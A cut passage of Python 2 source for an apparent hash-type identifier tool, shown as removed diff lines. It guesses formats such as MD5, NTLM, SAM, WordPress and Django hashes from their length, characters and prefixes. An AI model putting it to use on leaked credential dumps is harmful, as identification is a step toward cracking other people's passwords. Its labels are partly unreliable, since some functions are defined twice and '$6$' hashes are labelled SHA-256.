"105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); 